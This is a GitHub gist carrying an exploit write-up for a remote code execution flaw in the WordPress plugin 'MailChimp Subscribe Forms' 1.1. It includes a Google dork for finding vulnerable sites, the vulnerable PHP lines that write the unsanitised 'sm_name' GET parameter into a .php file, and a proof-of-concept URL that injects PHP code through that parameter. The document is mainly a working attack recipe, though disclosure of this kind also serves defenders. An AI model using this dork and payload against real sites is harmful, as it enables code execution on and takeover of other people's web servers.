Created
March 31, 2016 01:45
-
-
Save CCrashBandicot/c54720368babf5e2108cbe54db9807e1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution | |
# Date: 23-03-2016 | |
# Exploit Author: CrashBandicot | |
# Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/ | |
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/ | |
# Tested on: MSWin32 | |
# Version: 1.1 | |
# Vulnerability in GET | |
# Put your mail for subscribe and send but add in URL the Parameter sm_name with PHP Code | |
# Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php | |
18. if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) { | |
... | |
23. $smf_data = '* Name : '.$_GET['sm_name']; | |
24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL; | |
... | |
36. $file = "sm_subscribers_list.php"; | |
... | |
39. $fp = fopen($file, "a"); | |
40. fwrite($fp, $smf_data); | |
... | |
42. fclose($fp); | |
# PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe | |
# Result in file sm_subscribers_list.php | |
# PicS : http://i.imgur.com/HHtuycC.png |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment